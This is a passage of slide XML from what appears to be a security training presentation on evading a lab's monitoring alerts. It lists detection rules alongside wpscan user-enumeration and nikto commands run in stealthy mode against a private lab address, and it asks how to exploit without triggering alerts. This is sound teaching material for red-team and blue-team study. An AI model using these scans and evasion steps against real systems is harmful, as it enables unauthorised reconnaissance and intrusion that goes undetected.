              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2470" name="Google Shape;2470;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2471" name="Google Shape;2471;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659500" cy="1612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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2477" name="Google Shape;2477;g13355dbaffb_8_8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32716"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6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2478" name="Google Shape;2478;g13355dbaffb_8_8"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which alerts detect this exploit? </a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHEN count() GROUPED OVER top 5 '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.response.status_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' IS ABOVE 400 FOR THE      LAST 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which metrics do they measure?</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.response.status.code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk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400</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the Threshold</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Above 400</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2479" name="Google Shape;2479;g13355dbaffb_8_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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2480" name="Google Shape;2480;g13355dbaffb_8_8"/>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85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2486" name="Google Shape;2486;g13355dbaffb_8_1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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Enumeration</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2487" name="Google Shape;2487;g13355dbaffb_8_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22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2488" name="Google Shape;2488;g13355dbaffb_8_19"/>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489" name="Google Shape;2489;g13355dbaffb_8_19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33" y="2028442"/>
            <a:ext cx="24377700" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-501650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can you execute the same exploit without triggering the alert?</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-482600" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>wpscan -url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t> -e u –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>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stealthy</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1D1C1D"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there alternative exploits that may perform better?</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikto : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nikto is a pluggable web server and CGI scanner written in Perl, using rfp’s LibWhisker to perform fast security or informational checks.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nikto -C all -h -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk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timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ &lt;192.168.1.110&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2490" name="Google Shape;2490;g13355dbaffb_8_19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11149400" y="6938363"/>
            <a:ext cx="12496800" cy="5876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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2495" name="Google Shape;2495;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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1"/>
              <a:t>Weak Password on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>SSH Port 22</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2496" name="Google Shape;2496;p18"/>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23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2497" name="Google Shape;2497;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2019175"/>
            <a:ext cx="22942800" cy="9866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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which alerts detect this exploit? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN sum() OF http.request.bytes OVER all documents IS ABOVE 3500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk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FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> THE LAST 1 minute</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which metrics do they measure?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http.request.bytes &gt;=3500</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which thresholds do they fire at?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Above 3500</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
